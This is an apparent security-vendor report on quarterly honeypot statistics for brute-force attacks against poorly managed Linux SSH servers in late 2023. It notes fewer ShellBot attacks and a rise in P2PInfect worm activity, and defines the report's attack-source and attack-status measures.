Overview

 

AhnLab SEcurity intelligence Center (ASEC) conducts response and classification of brute force or dictionary attacks targeting poorly managed Linux SSH servers using honeypots. This report will cover the status of attack sources identified in the fourth quarter of 2023 based on logs, as well as statistics on attacks performed by these attack sources. Furthermore, malware used in each attack will be categorized with a summary of the statistical details.

 

 

Statistics

 

1. Status of Attacks Against Linux SSH Servers

 

The following statistics are based on the AhnLab honeypot logs for attacks targeting Linux SSH servers during the fourth quarter of 2023. One notable characteristic of the fourth quarter of 2023 is that while the quantity of attack sources remained relatively stable, the number of attacks decreased. This decrease can be attributed to the reduced number of ShellBot attacks performed by multiple attack sources. Additionally, starting from November, there was an increase in the number of attack sources, which is a result of the recent surge in attacks by the P2PInfect worm malware.

Figure 1. Attacks against Linux SSH servers in Q4 2023

 

The “Attack source” category refers to the quantity of systems used in attacks by malware or threat actors. In other words, it refers to systems where a history of actual malware installation commands being executed has been confirmed. ASEC honeypots collect logs for attacks targeting poorly managed Linux SSH servers. In this context, poorly managed environments refer to environments with vulnerabilities to brute force or dictionary attacks due to inadequately managed account credentials. If successful login occurs on inadequately managed systems, the malware or threat actor can gain control over those systems. 

The “Attack status” shows the number of times threat actors or malware attacked the system. Attacks on poorly managed Linux SSH servers typically begin with scanning, and most attack attempts end after the account credentials are obtained through brute force or dictionary attacks, or after the subsequent phase of collecting basic information. Here, statistics have been compiled based on cases where logs show the installation of actual malware beyond these processes.